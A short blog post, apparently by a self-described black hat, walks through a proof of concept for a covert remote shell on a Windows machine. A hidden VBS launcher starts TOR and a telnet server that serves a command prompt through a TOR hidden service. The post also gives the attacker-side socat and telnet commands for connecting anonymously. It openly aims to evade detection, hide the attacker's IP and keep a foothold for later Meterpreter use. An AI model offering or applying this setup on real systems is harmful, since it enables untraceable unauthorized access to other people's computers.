Under the radar remote shell

Telnet shell through TOR hidden services

As a black hat you always want to stay undetected. Even if you are detected you don’t want to leave traces back to your IP. The onion router (TOR) is a perfect solution for hiding your identity.

I set up a POC to show that it’s possible to gain access to a target machine via TOR hidden services. You can see the video here:



The target windows machine

  1. Clone my git-project into the folder “c:\Tor-POC”.
  2. First compile the telnet-server from “c:\Tor-POC\src\TelnetSrv” in Visual studio community edition. Place the output exe-file in “c:\Tor-POC\”. I could provide you the exe-file, but why should you trust a random exe-file from the internet?
  3. Download the latest TOR expert bundle for windows and extract it into the “c:\Tor-POC\bin\” folder

Start the “c:\Tor-POC\start.vbs”. This script will launch TOR and then the telnet server in the background. These will be hidden to the user, but can be found in the process list.

The first time TOR is started, it creates a public/private-keypair that is stored in “c:\Tor-POC\Data\HiddenService”. Take a note of your generated hidden service addres in the file “hostname”. It will look like xxxxxxxxxxxxxx.onion.

Here is what is happening:

  1. In the torrc is defined that all incoming TCP connections to xxxxxxxxxxxxxx.onion on port 8888 will be redirected to localhost:4444.
  2. The telnet server is listening on port 4444. As soon as it gets a connection it will pass the stdin/stdout to a command prompt.

On the kali box

In one terminal session you start TOR.


The first thing it does is connecting to the TOR network and then it sets up a SOCKS proxy server listening on port 9050. All traffic you want flowing through the TOR network has to go through this SOCKS server.

In another terminal session you start socat

socat -v TCP4-LISTEN:2222,fork SOCKS4A:,socksport=9050

This sets up a TCP listener on port 2222 on the kali box. All connections established to localhost:2222 will be sent through the TOR SOCKS proxy to the defined hidden service. In this case it’s xxxxxxxxxxxxxx.onion at port 8888.

Finally you can access your target machine:

telnet localhost 2222

Be aware that this is very basic telnet. No tab or arrow keys, no nice screen formatting. There might be problems with piping too.

But it’s enough to keep a foothold on the machine and maybe later remotely add a metasploit meterpreter or something of your own taste.

Leave a Reply

Your email address will not be published. Required fields are marked *